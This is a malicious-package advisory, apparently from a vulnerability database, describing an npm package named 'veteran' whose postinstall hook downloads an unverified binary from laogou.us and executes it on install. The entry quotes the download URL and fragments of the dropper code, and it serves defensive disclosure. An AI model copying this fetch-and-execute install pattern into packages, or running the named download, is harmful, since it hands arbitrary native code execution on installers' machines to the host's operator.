MAL-2026-4703

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4) On `npm install`, the package's postinstall hook (`install.js`, registered via `package.json` line 10 `"postinstall": "node install.js"`) downloads a platform-specific executable from `https://laogou.us/download/veteran/v1.0.0/veteran_1.0.0_<platform>_<arch>.{tar.gz,zip}` (install.js:13 `const DOWNLOAD_BASE_URL = 'https://laogou.us/download/veteran'`), extracts it via shell `tar`/`unzip`, `chmod 0o755`s it (install.js:165), and immediately executes it (install.js:170 `execSync("${BIN_PATH}" version",...)`). The download host `laogou.us` does not match the package's declared publisher/homepage (`github.com/yongjie0203/veteran`); the URL is not version-pinned to a hash or signature; no checksum or signature verification is performed on the fetched bytes; and source comments suggest the URL is meant to be swapped by future maintainers. The operator of `laogou.us` can therefore serve arbitrary native code to every installer, with the bytes executed under the installer's user on `npm install`. This matches the publisher-mismatched, unverified, mutable-host dropper pattern.